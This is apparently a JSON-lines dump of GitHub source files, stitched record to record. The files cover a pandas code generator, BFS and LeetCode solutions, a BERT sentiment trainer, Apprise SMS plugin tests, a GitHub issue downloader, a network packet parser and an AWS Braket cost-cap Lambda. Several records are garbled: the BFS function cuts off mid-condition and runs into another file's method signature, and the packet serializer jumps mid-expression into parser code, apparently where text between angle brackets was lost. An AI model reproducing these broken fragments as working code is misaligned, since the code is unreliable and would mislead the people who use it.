in enumerate(base_field_list)\n if select_list[i]==True\n ])\n select_comment_list = ','.join([\n commend\n for i,commend in enumerate(base_comment_list)\n if select_list[i]==True\n \n ])\n cond_list = ','.join([\n cond\n for cond in base_data['cond_list']\n if cond.strip() != ''\n ])\n # def chunk_append(root_chunk, append_info, key, key_type=str):\n key_type = 'str'\n # append_key_list = [\n # field\n # for i,field in enumerate(base_field_list)\n # if key_list[i]==True\n # ]\n # append_key = ''\n # if len(append_key_list)>0:\n # append_key = append_key_list[0]\n append_key = base_data.get('append_key', '')\n root_key = base_data.get('prev_root_key', '')\n\n r = f\"\"\"\ndef f{self.functor_id}(chunk):\n \"{self.functor.__class__.__name__}\"\n # {tb_cn_name}\n # {select_comment_list}\n root_key,append_key = {root_key},{append_key}\n new_chunk = chunk_append(chunk, append_info=[\n mysql_chain.{db_name},\n \"{tb_name}\",\n \"{select_field_list}\",\n \"{cond_list}\",\n ], key=[\n root_key,append_key\n ], key_type={key_type})\n return new_chunk\n \"\"\".strip()\n return r\n \n def saveExcel(self):\n r = f\"\"\"\ndef f_save(df):\n \"{self.functor.__class__.__name__}\"\n print('save.df', df)\n \"\"\".strip()\n return r\n\n\n\n","repo_name":"ChrisChenD/module_creator","sub_path":"plan_flask/module/code_maker/hide/panda_code.py","file_name":"panda_code.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"6066526059","text":"from collections import deque\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\ndef bfs(place, x, y, visited):\n result = 1\n visited[x][y] = True\n\n # store the depth in the queue together with the coordinates\n queue = deque([[(x, y), 0]])\n while queue:\n v, depth = queue.popleft()\n depth += 1\n if depth > 2: break\n for i in range(4):\n nx = v[0] + dx[i]\n ny = v[1] + dy[i]\n if 0<=nx Optional[ListNode]:\n \"\"\"\n Runtime: 36 ms, faster than 58.14% of Python3 online submissions for Middle of the Linked List.\n Memory Usage: 13.8 MB, less than 83.82% of Python3 online submissions for Middle of the Linked List.\n \"\"\"\n n = 1\n node = head\n\n while node.next:\n node = node.next\n n += 1\n\n midpoint = n // 2\n node = head\n for _ in range(midpoint):\n node = node.next\n\n return node\n","repo_name":"IAjimi/Leetcode","sub_path":"876_Middle_of_Linked_List.py","file_name":"876_Middle_of_Linked_List.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4643050774","text":"from torch.utils.data import Dataset\nfrom datasets import load_dataset\n\nclass MyDataset(Dataset):\n type = 0\n def __init__(self, split):\n self.dataset = load_dataset(path=\"csv\", data_files=f\"./data/{split}.csv\", split=\"train\")\n if split == 'train':\n self.type = 0\n else:\n self.type = 1\n def __len__(self):\n return len(self.dataset)\n def maxlen(self):\n maxlen = 0\n for i in self.dataset:\n if len(i['text']) > maxlen:\n maxlen = len(i['text'])\n return maxlen\n def __getitem__(self, item):\n text = self.dataset[item][\"text\"]\n label = self.dataset[item][\"class\"]\n return text, label\n\n\n\n\nif __name__ == '__main__':\n dataset = MyDataset(\"train\")\n print(dataset.type)\n # max length is 196\n for i,(text,label) in enumerate(dataset):\n 
print(label)\n\n\n\n\n\n\n\n","repo_name":"nonames819/NER-Affection","sub_path":"NER&Affection/baidu_classify/MyData.py","file_name":"MyData.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6226158641","text":"import torch\nimport random\nimport numpy as np\nfrom transformers import BertTokenizer\nfrom torchtext import data\nfrom text_classification.train_data import *\nfrom transformers import BertTokenizer, BertModel\nfrom model.BERTModel import BERTModel\nfrom output.train_model import *\nimport torch.optim as optim\nimport torch.nn as nn\nfrom collections import defaultdict\nimport pandas as pd\n\nbert = BertModel.from_pretrained('bert-base-uncased')\nBATCH_SIZE = 128\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased') \nmax_input_length = tokenizer.max_model_input_sizes['bert-base-uncased']\ninit_token_idx = tokenizer.cls_token_id\neos_token_idx = tokenizer.sep_token_id\npad_token_idx = tokenizer.pad_token_id\nunk_token_idx = tokenizer.unk_token_id\n\n#model need\nHIDDEN_DIM = 256\nOUTPUT_DIM = 1\nN_LAYERS = 2\nBIDIRECTIONAL = True\nDROPOUT = 0.25\ndevice = torch.device('cpu')\n\n\ndef tokenize_and_cut(sentence):\n tokens = tokenizer.tokenize(sentence) \n tokens = tokens[:max_input_length-2]\n return tokens\n \nclass Model_trainer:\n SEED = 1234\n random.seed(SEED)\n np.random.seed(SEED)\n torch.manual_seed(SEED)\n torch.backends.cudnn.deterministic = True\n TEXT = data.Field(batch_first = True,\n use_vocab = False,\n tokenize = tokenize_and_cut,\n preprocessing = tokenizer.convert_tokens_to_ids,\n init_token = init_token_idx,\n eos_token = eos_token_idx,\n pad_token = pad_token_idx,\n unk_token = unk_token_idx)\n\n LABEL = data.LabelField(dtype = torch.float)\n fields = [(None, None),('text', TEXT),('label', LABEL)]\n \n def __init__(self):\n self.owner = 'xinhuan'\n \n def get_data(self,index):\n train_data,test_data = get_traindata(self.fields,index)\n print(tokenizer.convert_ids_to_tokens(vars(train_data.examples[6])['text']))\n train_data, valid_data = train_data.split(random_state = random.seed(self.SEED))\n device = torch.device('cpu')\n train_iterator, valid_iterator, test_iterator = data.BucketIterator.splits(\n (train_data, valid_data, test_data), \n sort = False,\n batch_size = BATCH_SIZE, \n device = device\n )\n self.LABEL.build_vocab(train_data)\n self.LABEL.vocab.stoi =defaultdict(None, {'0': 0, '1': 1})\n print(self.LABEL.vocab.stoi)\n return train_iterator, valid_iterator, test_iterator\n \n def get_final_data(self):\n train_data = final_data(self.fields)\n print(tokenizer.convert_ids_to_tokens(vars(train_data.examples[6])['text']))\n train_data, valid_data = train_data.split(random_state = random.seed(self.SEED))\n train_iterator, valid_iterator = data.BucketIterator.splits(\n (train_data, valid_data), \n sort = False,\n batch_size = BATCH_SIZE, \n device = device\n )\n self.LABEL.build_vocab(train_data)\n self.LABEL.vocab.stoi =defaultdict(None, {'0': 0, '1': 1})\n print(self.LABEL.vocab.stoi)\n return train_iterator, valid_iterator\n \n \n def train_model(self, model,i):\n train_iterator, valid_iterator, test_iterator = self.get_data(i)\n N_EPOCHS = 5\n\n best_valid_loss = float('inf')\n\n for epoch in range(N_EPOCHS):\n\n start_time = time.time()\n\n train_loss, train_acc = train(model, train_iterator, optimizer, criterion)\n valid_loss, valid_acc = evaluate(model, valid_iterator, criterion)\n \n end_time = time.time()\n \n epoch_mins, epoch_secs = 
epoch_time(start_time, end_time)\n \n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), 'tut6-model.pt')\n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. Acc: {valid_acc*100:.2f}%')\n \n model.load_state_dict(torch.load('tut6-model.pt'))\n test_loss, test_acc = evaluate(model, test_iterator, criterion)\n print(f'Test Loss: {test_loss:.3f} | Test Acc: {test_acc*100:.2f}%')\n \n def train_final_model(self, model):\n train_iterator, valid_iterator = self.get_final_data()\n N_EPOCHS = 5\n\n best_valid_loss = float('inf')\n\n for epoch in range(N_EPOCHS):\n\n start_time = time.time()\n\n train_loss, train_acc = train(model, train_iterator, optimizer, criterion)\n valid_loss, valid_acc = evaluate(model, valid_iterator, criterion)\n \n end_time = time.time()\n \n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n \n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), 'final-model.pt')\n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. Acc: {valid_acc*100:.2f}%')\n \n \n def predict_sentiment(self,model, tokenizer, sentence):\n model.eval()\n tokens = tokenizer.tokenize(sentence)\n tokens = tokens[:max_input_length-2]\n indexed = [init_token_idx] + tokenizer.convert_tokens_to_ids(tokens) + [eos_token_idx]\n tensor = torch.LongTensor(indexed).to(device)\n tensor = tensor.unsqueeze(0)\n prediction = torch.sigmoid(model(tensor))\n return prediction.item() \n \n \n \n \nif __name__ == \"__main__\":\n \n \n model = BERTModel(bert,\n HIDDEN_DIM,\n OUTPUT_DIM,\n N_LAYERS,\n BIDIRECTIONAL,\n DROPOUT)\n optimizer = optim.Adam(model.parameters())\n criterion = nn.BCEWithLogitsLoss()\n \n model = model.to(device)\n \n criterion = criterion.to(device)\n #test_file = path +filename\n model_trainer=Model_trainer()\n model_trainer.train_final_model(model)\n # dataframe = pd.read_csv(test_file) \n # data_list = dataframe['twitters'].values.tolist()\n # model.load_state_dict(torch.load('tut6-model.pt'))\n # fake_score_list = []\n # for sentence in data_list:\n # fake_score = model_trainer.predict_sentiment(model,tokenizer,sentence)\n # fake_score_list.append(fake_score)\n # dataframe[\"fake_score\"] = fake_score_list\n # dataframe.to_csv(\"text_classification/data/results/%d.csv\" %i, index = False) \n \n \n \n \n \n \n \n\n\n\n \n","repo_name":"damiano/pan2020-rmit","sub_path":"modelTrainer.py","file_name":"modelTrainer.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26746934014","text":"from typing import Callable, Optional\nimport apache_beam as beam\nfrom apache_beam.options.pipeline_options import PipelineOptions\n\n\ndef run(\n input_text: str,\n beam_options: Optional[PipelineOptions] = None,\n test: Callable[[beam.PCollection], None] = lambda _: None,\n) -> None:\n with beam.Pipeline(options=beam_options) as pipeline:\n elements = (\n pipeline\n | \"Create elements\" >> beam.Create([\"Hello\", \"World!\", input_text])\n | \"Print elements\" >> beam.Map(print)\n )\n\n # Used for testing only.\n 
test(elements)\n","repo_name":"vicenteg/cookiecutter-apache-beam","sub_path":"beam-python/{{cookiecutter.project_slug}}/{{cookiecutter.pipeline_module}}/{{cookiecutter.pipeline_main_class}}.py","file_name":"{{cookiecutter.pipeline_main_class}}.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"15224652667","text":"import requests\nfrom json import loads\nfrom unittest import mock\nfrom apprise.plugins.NotifyD7Networks import NotifyD7Networks\nfrom helpers import AppriseURLTester\nfrom apprise import Apprise\nfrom apprise import NotifyType\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# Our Testing URLs\napprise_url_tests = (\n ('d7sms://', {\n # We failed to identify any valid authentication\n 'instance': TypeError,\n }),\n ('d7sms://:@/', {\n # We failed to identify any valid authentication\n 'instance': TypeError,\n }),\n ('d7sms://token@{}/{}/{}'.format('1' * 9, '2' * 15, 'a' * 13), {\n # No valid targets to notify\n 'instance': NotifyD7Networks,\n # Since there are no targets specified we expect a False return on\n # send()\n 'notify_response': False,\n }),\n ('d7sms://token1@{}?batch=yes'.format('3' * 14), {\n # valid number\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...1@',\n }),\n ('d7sms://token:colon2@{}?batch=yes'.format('3' * 14), {\n # valid number - token containing a colon\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...2@',\n }),\n ('d7sms://:token3@{}?batch=yes'.format('3' * 14), {\n # valid number - token starting with a colon\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://:...3@',\n }),\n ('d7sms://{}?token=token6'.format('3' * 14), {\n # valid number - token starting with a colon\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...6@',\n }),\n ('d7sms://token4@{}?unicode=no'.format('3' * 14), {\n # valid number - test unicode\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...4@',\n }),\n ('d7sms://token8@{}/{}/?unicode=yes'.format('3' * 14, '4' * 14), {\n # valid number - test unicode\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...8@',\n }),\n ('d7sms://token@{}?batch=yes&to={}'.format('3' * 14, '6' * 14), {\n # valid number\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}?batch=yes&from=apprise'.format('3' * 14), {\n # valid number, utilizing the optional from= variable\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}?batch=yes&source=apprise'.format('3' * 14), {\n # valid number, utilizing the optional source= variable (same as from)\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}?batch=no'.format('3' * 14), {\n # valid number - no batch\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}'.format('3' * 14), {\n 'instance': NotifyD7Networks,\n # throw a bizarre code forcing us to fail to look it up\n 'response': False,\n 'requests_response_code': 999,\n }),\n ('d7sms://token@{}'.format('3' * 14), {\n 'instance': NotifyD7Networks,\n # Throws a series of connection and transfer exceptions when this flag\n # is set and tests that we gracefully handle them\n 
'test_requests_exceptions': True,\n }),\n)\n\n\ndef test_plugin_d7networks_urls():\n \"\"\"\n NotifyD7Networks() Apprise URLs\n\n \"\"\"\n\n # Run our general tests\n AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\n@mock.patch('requests.post')\ndef test_plugin_d7networks_edge_cases(mock_post):\n \"\"\"\n NotifyD7Networks() Edge Cases tests\n\n \"\"\"\n\n # Prepare Mock\n request = mock.Mock()\n request.content = '{}'\n request.status_code = requests.codes.ok\n mock_post.return_value = request\n\n # Initializations\n aobj = Apprise()\n assert aobj.add('d7sms://Token@15551231234/15551231236')\n\n body = \"test message\"\n\n # Send our notification\n assert aobj.notify(\n body=body, title='title', notify_type=NotifyType.INFO)\n\n # Not set to batch, so we send 2 different messages\n assert mock_post.call_count == 2\n assert mock_post.call_args_list[0][0][0] == \\\n 'https://api.d7networks.com/messages/v1/send'\n assert mock_post.call_args_list[1][0][0] == \\\n 'https://api.d7networks.com/messages/v1/send'\n\n # our first post\n data = loads(mock_post.call_args_list[0][1]['data'])\n assert len(data['messages']) == 1\n message = data['messages'][0]\n assert len(message['recipients']) == 1\n assert message['content'] == 'title\\r\\ntest message'\n assert message['data_coding'] == 'auto'\n\n # our second post\n data = loads(mock_post.call_args_list[1][1]['data'])\n assert len(data['messages']) == 1\n message = data['messages'][0]\n assert len(message['recipients']) == 1\n assert message['content'] == 'title\\r\\ntest message'\n assert message['data_coding'] == 'auto'\n\n #\n # Do a batch test now\n #\n\n mock_post.reset_mock()\n\n # Initializations\n aobj = Apprise()\n assert aobj.add('d7sms://Token@15551231234/15551231236?batch=yes')\n\n body = \"test message\"\n\n # Send our notification\n assert aobj.notify(\n body=body, title='title', notify_type=NotifyType.INFO)\n\n # All notifications go through in a batch\n assert mock_post.call_count == 1\n assert mock_post.call_args_list[0][0][0] == \\\n 'https://api.d7networks.com/messages/v1/send'\n\n data = loads(mock_post.call_args_list[0][1]['data'])\n assert len(data['messages']) == 1\n message = data['messages'][0]\n # All of our phone numbers were added here\n assert len(message['recipients']) == 2\n assert '15551231234' in message['recipients']\n assert '15551231236' in message['recipients']\n assert message['content'] == 'title\\r\\ntest message'\n assert message['data_coding'] == 'auto'\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_d7networks.py","file_name":"test_plugin_d7networks.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"} +{"seq_id":"13367713211","text":"# -*- coding: utf-8 -*-\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport logging\nfrom typing import Callable, Iterator, NewType\n\nfrom ratelimit import limits, sleep_and_retry\n\nfrom bugbug import db\nfrom bugbug.utils import get_secret, get_session\n\nlogger = logging.getLogger(__name__)\n\nIssueDict = NewType(\"IssueDict\", dict)\n\nDB_VERSION = 1\nDB_URL = \"https://community-tc.services.mozilla.com/api/index/v1/task/project.bugbug.data_github_{}_{}_issues.latest/artifacts/public/github_{}_{}_issues.json.zst\"\n\nPER_PAGE = 100\n# Rate limit period in seconds\nRATE_LIMIT_PERIOD = 900\n\n\nclass Github:\n def __init__(\n self, owner: str, repo: str, state: str = \"all\", retrieve_events: bool = False\n ) -> None:\n self.owner = owner\n self.repo = repo\n self.state = state\n self.retrieve_events = retrieve_events\n\n self.db_path = \"data/github_{}_{}_issues.json\".format(self.owner, self.repo)\n\n if not db.is_registered(self.db_path):\n db.register(\n self.db_path,\n DB_URL.format(self.owner, self.repo, self.owner, self.repo),\n DB_VERSION,\n )\n\n def get_issues(self) -> Iterator[IssueDict]:\n yield from db.read(self.db_path)\n\n def delete_issues(self, match: Callable[[IssueDict], bool]) -> None:\n db.delete(self.db_path, match)\n\n @sleep_and_retry\n @limits(calls=1200, period=RATE_LIMIT_PERIOD)\n def api_limit(self):\n # Allow a limited number of requests to account for rate limiting\n pass\n\n def get_token(self) -> str:\n return get_secret(\"GITHUB_TOKEN\")\n\n def fetch_events(self, events_url: str) -> list:\n self.api_limit()\n logger.info(\"Fetching %s\", events_url)\n headers = {\"Authorization\": \"token {}\".format(self.get_token())}\n response = get_session(\"github\").get(events_url, headers=headers)\n response.raise_for_status()\n events_raw = response.json()\n return events_raw\n\n def fetch_issues(\n self, url: str, retrieve_events: bool, params: dict | None = None\n ) -> tuple[list[IssueDict], dict]:\n self.api_limit()\n headers = {\"Authorization\": \"token {}\".format(self.get_token())}\n response = get_session(\"github\").get(url, params=params, headers=headers)\n response.raise_for_status()\n data = response.json()\n\n # If only one issue is requested, add it to a list\n if isinstance(data, dict):\n data = [data]\n\n logger.info(\"Fetching %s\", url)\n\n if retrieve_events:\n for item in data:\n events = self.fetch_events(item[\"events_url\"])\n item.update({\"events\": events})\n\n return data, response.links\n\n def get_start_page(self) -> int:\n # Determine next page to fetch based on number of downloaded issues\n issues = self.get_issues()\n count = sum(1 for _ in issues)\n return int(count / PER_PAGE) + 1\n\n def fetch_issues_updated_since_timestamp(self, since: str) -> list[IssueDict]:\n # Fetches changed and new issues since a specified timestamp\n url = \"https://api.github.com/repos/{}/{}/issues\".format(self.owner, self.repo)\n\n params = {\"state\": self.state, \"since\": since, \"per_page\": PER_PAGE, \"page\": 1}\n\n data, response_links = self.fetch_issues(\n url=url, retrieve_events=self.retrieve_events, params=params\n )\n\n # Fetch next page\n while \"next\" in response_links.keys():\n next_page_data, response_links = self.fetch_issues(\n response_links[\"next\"][\"url\"], self.retrieve_events\n )\n data += next_page_data\n\n logger.info(\"Done fetching updates\")\n\n return data\n\n def download_issues(self) -> None:\n # Fetches all issues sorted by date of creation in ascending order\n url = 
\"https://api.github.com/repos/{}/{}/issues\".format(self.owner, self.repo)\n start_page = self.get_start_page()\n\n params = {\n \"state\": self.state,\n \"sort\": \"created\",\n \"direction\": \"asc\",\n \"per_page\": PER_PAGE,\n \"page\": start_page,\n }\n\n data, response_links = self.fetch_issues(\n url=url, retrieve_events=self.retrieve_events, params=params\n )\n\n db.append(self.db_path, data)\n # Fetch next page\n while \"next\" in response_links.keys():\n next_page_data, response_links = self.fetch_issues(\n response_links[\"next\"][\"url\"], self.retrieve_events\n )\n db.append(self.db_path, next_page_data)\n\n logger.info(\"Done downloading\")\n\n def fetch_issue_by_number(\n self, owner: str, repo: str, issue_number: int, retrieve_events: bool = False\n ) -> IssueDict:\n # Fetches an issue by id\n url = \"https://api.github.com/repos/{}/{}/issues/{}\".format(\n owner, repo, issue_number\n )\n\n data = self.fetch_issues(url=url, retrieve_events=retrieve_events)\n\n return data[0][0]\n","repo_name":"mozilla/bugbug","sub_path":"bugbug/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","stars":469,"dataset":"github-code","pt":"21"} +{"seq_id":"12198330036","text":"# Input: nums = [2,7,11,15], target = 9\r\n# Output: [0,1]\r\n\r\nnums = [2,7,11,15]\r\ntarget = 9\r\n# nums = [3,2,4] \r\n# target = 6\r\n\r\ndef twoSum(nums, target):\r\n for index, val in enumerate(nums):\r\n x = target - val\r\n \r\n nums[index] = None\r\n \r\n if x in nums:\r\n return [index, nums.index(x)]\r\n\r\nx=twoSum(nums,target)\r\nprint(x)\r\n\r\n","repo_name":"Mirzo001/LeetCodeReview","sub_path":"1. Two Sum.py","file_name":"1. Two Sum.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31774745856","text":"import struct\nimport binascii\n\nclass Packet(object):\n\n def __init__(self, *args, **kwargs):\n if 'ver' in kwargs:\n self.ver = kwargs['ver']\n if 'flags' in kwargs:\n self.flags = kwargs['flags']\n if 'proto' in kwargs:\n self.proto = kwargs['proto']\n if 'dst_addr' in kwargs:\n self.dst_addr = kwargs['dst_addr']\n if 'src_addr' in kwargs:\n self.src_addr = kwargs['src_addr']\n self.length = 16\n self.option = 0\n self.ot_len = 0\n if 'option_list' in kwargs and kwargs['option_list'] != None:\n self.option = 1\n self.option_list = kwargs['option_list']\n self.ot_len = len(self.option_list) + 2\n self.length = self.length + self.ot_len\n if 'data' in kwargs:\n self.data = kwargs['data']\n self.length = self.length + len(self.data)\n\n def dumps(self):\n b = bytearray()\n #header = self.flags | (self.ver << 6) | (self.option << 5)\n header = self.ver | self.option << 2 | self.flags << 3\n b.extend(struct.pack('>B', header))\n b.extend(struct.pack('>B', self.proto))\n b.extend(struct.pack('> 2\n self.packet.flags = self.packet.header >> 3\n elif self.waiting == PacketEnum.WAITING_PROTO:\n done = self.feed(byte, PacketEnum.WAITING_LEN, None)\n if done:\n value = self.field()\n self.packet.proto = value[0]\n elif self.waiting == PacketEnum.WAITING_LEN:\n done = self.feed(byte, PacketEnum.WAITING_DST_ADDR, None)\n if done:\n f = self.field()\n self.packet.length, = struct.unpack_from(' dict:\n \"\"\"Cancel all QUEUED tasks if total shots or cost is over the max value and send result message to the email.\n\n Args:\n event (_type_): event\n context (_type_): context\n\n Returns:\n (str): json-format string\n \"\"\"\n # 定数設定\n 
SLACK_POST_URL = os.environ[\"SLACK_POST_URL\"]\n TOPIC_ARN = os.environ[\"TOPIC_ARN\"]\n MAX_SHOT_NUM = int(os.environ[\"MAX_SHOT_NUM\"])\n MAX_SHOT_COST = int(os.environ[\"MAX_SHOT_COST\"]) # dollar\n\n logger.info(event)\n\n # set boto user\n ama_us_west_1 = AmazonBraketlib(\"us-west-1\")\n ama_us_west_2 = AmazonBraketlib(\"us-west-2\")\n ama_us_east_1 = AmazonBraketlib(\"us-east-1\")\n clients: list = [ama_us_west_1, ama_us_west_2, ama_us_east_1]\n\n # device definition\n device_table: dict[str, list[str]] = settings.DEVICE_TABLE\n device_region_index_dict: dict[str, int] = settings.DEVICE_REGION_INDEX_DICT\n\n # setting device of Tasks that have now changed the status\n device_provider: str\n device_name: str\n is_known_device: bool\n (device_provider, device_name, is_known_device) = set_device_info(\n device_table, event\n )\n if is_known_device is False:\n post_slack(\"error: unknown_device\", SLACK_POST_URL, event)\n return {\"error\": \"unknown device\"}\n\n # store task results for each status to result dictionary\n shots_count_each_status: list[int] = [0, 0, 0]\n task_count_each_status: list[int] = [0, 0, 0]\n task_info_each_status: list = []\n result: dict = {}\n deviceArn: str = event[\"detail\"][\"deviceArn\"]\n (\n shots_count_each_status,\n task_count_each_status,\n task_info_each_status,\n result,\n ) = set_task_results(\n shots_count_each_status,\n task_count_each_status,\n task_info_each_status,\n clients,\n device_region_index_dict,\n device_provider,\n deviceArn,\n )\n\n # set output json string values\n lambda_output: dict = {}\n lambda_output = set_lambda_output(\n lambda_output, result, shots_count_each_status, task_count_each_status\n )\n\n deleted_result: list = delete_task_over_max_shot(\n MAX_SHOT_NUM,\n clients,\n device_region_index_dict,\n device_provider,\n shots_count_each_status,\n task_info_each_status,\n )\n\n deleted_result2: list = delete_task_over_max_cost(\n MAX_SHOT_COST,\n clients,\n device_region_index_dict,\n device_provider,\n shots_count_each_status,\n task_info_each_status,\n task_count_each_status,\n )\n\n send_email(lambda_output, TOPIC_ARN)\n post_slack(lambda_output, SLACK_POST_URL, event)\n\n return lambda_output\n\n\ndef set_task_results(\n shots_count_each_status: list[int],\n task_count_each_status: list[int],\n task_info_each_status: list,\n clients: list,\n device_region_index_dict: dict,\n device_provider: str,\n deviceArn: str,\n) -> tuple[list[int], list[int], list, dict]:\n # store task results for each status to result dictionary\n\n result: dict = {}\n today_date = [date.today().year, date.today().month, date.today().day]\n\n for task_status_index in range(3):\n result = clients[device_region_index_dict[device_provider]].get_info(\n *today_date, deviceArn, task_status_index\n )\n task_info_each_status.append(result)\n\n shots_count_each_status[task_status_index] += result[\"total_shots\"]\n\n if result[\"total_shots\"]:\n for id_name in result[\"id\"].keys():\n if \"/\" not in id_name:\n task_count_each_status[task_status_index] += len(\n result[\"id\"][id_name]\n )\n return (\n shots_count_each_status,\n task_count_each_status,\n task_info_each_status,\n result,\n )\n\n\ndef set_device_info(device_table: dict[str, list[str]], event) -> tuple[str, str, bool]:\n # setting device of Tasks that have now changed the status\n # for each device_table keys\n for device_provider in device_table.keys():\n # for each device_table values\n for device_name in device_table[device_provider]:\n if device_name in 
event[\"detail\"][\"deviceArn\"]:\n return (device_provider, device_name, True)\n return (\"\", \"\", False)\n\n\ndef set_lambda_output(\n lambda_output: dict,\n result: dict,\n shots_count_each_status: list[int],\n task_count_each_status: list[int],\n) -> dict:\n # set lambda_output in json string type\n lambda_output[\"date\"] = result[\"date\"]\n lambda_output[\"qpu\"] = result[\"qpu\"]\n lambda_output[\"QUEUED_shot_count\"] = shots_count_each_status[0]\n lambda_output[\"QUEUED_task_conut\"] = task_count_each_status[0]\n lambda_output[\"COMPLETED_shot_count\"] = shots_count_each_status[1]\n lambda_output[\"COMPLETED_task_count\"] = task_count_each_status[1]\n lambda_output[\"CANCELLED_shot_count\"] = shots_count_each_status[2]\n lambda_output[\"CANCELLED_task_count\"] = task_count_each_status[2]\n return lambda_output\n\n\ndef delete_task_over_max_shot(\n max_shot_num: int,\n clients: list,\n device_region_index_dict: dict,\n device_provider: str,\n shots_count_each_status: list[int],\n task_info_each_status: list[dict],\n):\n \"\"\"delete QUEUED task according to the number of shots\n Args:\n max_shot_num :\n clients :\n device_region_index_dict :\n device_name :\n Returns:\n result : TODO 削除したtask_id全て列挙\n \"\"\"\n\n # for debug\n print(\n \"\\r\"\n + str(datetime.now().time())\n + \" QUEUED \"\n + str(shots_count_each_status[0])\n + \" COMPLETED \"\n + str(shots_count_each_status[1])\n + \" CANCELLED \"\n + str(shots_count_each_status[2]),\n end=\"\",\n )\n\n # 現在QUEUEDのshots合計がMAX_SHOT以上なら, 全部のQUEUD taskを削除\n deleted_result = []\n if shots_count_each_status[0] >= max_shot_num:\n for bucket_name in task_info_each_status[0][\"id\"]:\n # bucket_nameにはbucketとそのfolderの両方がtask_idsに代入されるため,\n # '/'があったら飛ばす(folderの中のtaskはとばす)\n if \"/\" not in bucket_name:\n for task_id in task_info_each_status[0][\"id\"][bucket_name]:\n deleted_result.append(\n clients[\n device_region_index_dict[device_provider]\n ].delete_quantumTask(task_id)[\"quantumTaskArn\"]\n )\n return deleted_result\n\n\ndef delete_task_over_max_cost(\n max_cost: int,\n clients: list,\n device_region_index_dict: dict,\n device_provider: str,\n shots_count_each_status: list[int],\n task_info_each_status: list[dict],\n task_count_each_status: list[int],\n):\n \"\"\"Delete QUEUD task accordingly when the maximum cost is exceeded\n Args:\n max_cost :\n clients :\n device_region_index_dict :\n device_provider :\n device_name :\n Returns:\n result : 削除したtask_id 全列挙\n \"\"\"\n price_per_task: float = settings.PRICE_PER_TASK\n price_table: dict = settings.PRICE_TABLE\n price_each_status_index: dict = {\"QUEUED\": 0, \"COMPLETED\": 1, \"CANCELLED\": 2}\n price_each_status: list = [0] * len(price_each_status_index)\n\n # Calculate the total cost of each state\n for price_status in price_each_status_index:\n price_each_status[price_each_status_index[price_status]] = (\n shots_count_each_status[price_each_status_index[price_status]]\n * price_table[device_provider]\n + task_count_each_status[price_each_status_index[price_status]]\n * price_per_task\n )\n\n print(\n \"\\r\"\n + str(datetime.now().time())\n + \" QUEUED \"\n + str(price_each_status[0])\n + \" COMPLETED \"\n + str(price_each_status[1])\n + \" CANCELLED \"\n + str(price_each_status[2]),\n end=\"\",\n )\n\n # 現在QUEUEDのshots合計が50以上なら, 全部のQUEUED taskを削除\n deleted_result = []\n if price_each_status[0] >= max_cost:\n for bucket_name in task_info_each_status[0][\"id\"]:\n # bucket_nameにはbucketとそのfolderの両方がtask_idsに代入されるため,\n # '/'があったら飛ばす(folderの中のtaskはとばす)\n if \"/\" not in 
